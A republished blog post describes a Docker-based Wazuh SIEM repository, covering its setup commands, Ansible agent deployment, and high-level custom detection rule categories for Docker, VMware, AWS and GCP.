Tools

Tools: I built a production-ready Wazuh SIEM on Docker (with custom rules for VMware, AWS and GCP) How

2026-05-02 0 views admin
Tools: I built a production-ready Wazuh SIEM on Docker (with custom rules for VMware, AWS and GCP) How

How I built a production-ready Wazuh SIEM on Docker (with custom rules for VMware, AWS and GCP)

The problem with most Wazuh setups

What the stack looks like

Custom detection rules

Ansible agent deployment

Getting started

Lab vs production mode

What's next Most Wazuh tutorials stop at "here's how to spin up the containers." That's fine for a demo, but getting it to actually monitor your infrastructure — with meaningful alerts, automated agent deployment, and cloud integrations — is a different story. I spent a few weeks assembling everything into a single repo: wazuh-docker-monitoring-platform. Here's what it includes and why I built each piece. Out of the box, Wazuh gives you generic Linux alerts. Useful, but noisy. What I needed was: Everything runs via docker compose. There's also a docker-compose.lab.yml overlay that cuts resource usage for testing. This is the part I'm most proud of. The rules/ directory has rules for: Docker (rules/docker/) VMware (rules/vmware/) Instead of deploying agents manually, the repo includes Ansible playbooks that handle everything: There's also a network discovery script that scans a subnet, generates an Ansible inventory, and feeds it straight into the deployment pipeline: One command: scan → discover → deploy agents → verify. Dashboard is at https://localhost:5601 in a few minutes. Running this on a homelab with limited RAM? Use the lab overlay: It reduces the Wazuh Indexer heap and manager memory limits to fit on a 8GB machine. The repo roadmap includes: If you're running VMware, Docker, or any cloud infrastructure and want proper security visibility without paying for a commercial SIEM, give it a try. PRs and rule contributions welcome. → github.com/GiulioSavini/wazuh-docker-monitoring-platform Templates let you quickly answer FAQs or store snippets for re-use. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse

Code Block

Copy

┌─────────────────────────────────┐ │ Wazuh Manager :1514 / :55000 │ │ Wazuh Indexer :9200 │ │ Wazuh Dashboard :5601 │ │ NGINX (optional reverse proxy) │ └─────────────────────────────────┘ ↑ agents on port 1514 Linux servers · Windows servers · Docker hosts · vCenter ↑ log forwarding AWS CloudTrail (S3) · GCP Pub/Sub ┌─────────────────────────────────┐ │ Wazuh Manager :1514 / :55000 │ │ Wazuh Indexer :9200 │ │ Wazuh Dashboard :5601 │ │ NGINX (optional reverse proxy) │ └─────────────────────────────────┘ ↑ agents on port 1514 Linux servers · Windows servers · Docker hosts · vCenter ↑ log forwarding AWS CloudTrail (S3) · GCP Pub/Sub ┌─────────────────────────────────┐ │ Wazuh Manager :1514 / :55000 │ │ Wazuh Indexer :9200 │ │ Wazuh Dashboard :5601 │ │ NGINX (optional reverse proxy) │ └─────────────────────────────────┘ ↑ agents on port 1514 Linux servers · Windows servers · Docker hosts · vCenter ↑ log forwarding AWS CloudTrail (S3) · GCP Pub/Sub # Deploy to all Linux hosts in inventory ansible-playbook -i inventories/production playbooks/deploy-linux-agent.yml # Windows too (via WinRM) ansible-playbook -i inventories/production playbooks/deploy-windows-agent.yml # Deploy to all Linux hosts in inventory ansible-playbook -i inventories/production playbooks/deploy-linux-agent.yml # Windows too (via WinRM) ansible-playbook -i inventories/production playbooks/deploy-windows-agent.yml # Deploy to all Linux hosts in inventory ansible-playbook -i inventories/production playbooks/deploy-linux-agent.yml # Windows too (via WinRM) ansible-playbook -i inventories/production playbooks/deploy-windows-agent.yml make onboard SUBNET=10.0.0.0/24 make onboard SUBNET=10.0.0.0/24 make onboard SUBNET=10.0.0.0/24 git clone https://github.com/GiulioSavini/wazuh-docker-monitoring-platform.git cd wazuh-docker-monitoring-platform make preflight # validate Docker, kernel params, disk, ports cp .env.example .env # set your passwords make init # generate TLS certs make deploy # bring up the stack git clone https://github.com/GiulioSavini/wazuh-docker-monitoring-platform.git cd wazuh-docker-monitoring-platform make preflight # validate Docker, kernel params, disk, ports cp .env.example .env # set your passwords make init # generate TLS certs make deploy # bring up the stack git clone https://github.com/GiulioSavini/wazuh-docker-monitoring-platform.git cd wazuh-docker-monitoring-platform make preflight # validate Docker, kernel params, disk, ports cp .env.example .env # set your passwords make init # generate TLS certs make deploy # bring up the stack docker compose -f docker-compose.yml -f docker-compose.lab.yml up -d docker compose -f docker-compose.yml -f docker-compose.lab.yml up -d docker compose -f docker-compose.yml -f docker-compose.lab.yml up -d - Detection rules tuned for Docker container abuse (privileged runs, suspicious mounts, crypto-mining) - VMware vCenter monitoring — snapshot abuse, vMotion events, auth brute force - AWS CloudTrail and GCP Audit Log anomalies mapped to Wazuh rules - A way to deploy agents at scale without SSHing into 30 machines one by one - Something that works in both a lab (4GB RAM) and production - Container exec events - Privileged container creation - Host namespace abuse (--pid=host, --network=host) - Suspicious bind mounts (/etc, /var/run/docker.sock) - Crypto-mining signatures - VM power state changes - Snapshot creation/deletion (ransomware indicator) - Host disconnect events - vCenter login brute force - IAM policy changes - Security group opened to 0.0.0.0/0 - Console login without MFA - CloudTrail disabled or deleted - Public bucket created - Firewall rule opened to 0.0.0.0/0 - IAM policy changes - Compute instance created outside allowed regions - Wazuh cluster mode (multi-node manager) - Kubernetes Helm chart - SOAR integration (Shuffle / TheHive) - Sigma rule auto-import - Automated compliance dashboards (PCI-DSS, CIS)

🏷️ Tags

toolsutilitiessecurity toolsbuiltproductionreadywazuhdockercustomrules

More from Tools

Tools: How to Deploy Llama 3.2 1B with Ollama on a $4/Month DigitalOcean Droplet: Sub-$50/Year Edge AI Inference (2026)

Tools: How to Deploy Llama 3.2 1B with Ollama on a $4/Month DigitalOcean Droplet: Sub-$50/Year Edge AI Inference (2026)

2026-05-02 0
Tools: Ultimate Guide: GCP in Action: Building a Persistent AI Assistant with GCE, Hermes Agent, and Telegram

Tools: Ultimate Guide: GCP in Action: Building a Persistent AI Assistant with GCE, Hermes Agent, and Telegram

2026-05-02 0
Tools: GCP Hands-on: Deploying OpenAB - Building a Gemini ACP Bridge for Telegram on GCE (2026)

Tools: GCP Hands-on: Deploying OpenAB - Building a Gemini ACP Bridge for Telegram on GCE (2026)

2026-05-02 0
Tools: How to Deploy a Node.js App on Heroku in 2026

Tools: How to Deploy a Node.js App on Heroku in 2026

2026-05-02 0

Trending

1

CVE-2025-61481: Critical Remote Code Execution Vulnerability in MikroTik RouterOS & SwitchOS

2025-10-27 • 189 views
2

CVE-2025-43939: Dell Unity OS Command Injection (High)

2025-10-30 • 148 views
3

Google disputes false claims of massive Gmail data breach

2025-10-30 • 130 views
4

Microsoft: DNS outage impacts Azure and Microsoft 365 services

2025-10-30 • 88 views
5

3.5B Accounts, 1 Critical Flaw: Meta Closes WhatsApp Data-Harvesting

2025-11-25 • 81 views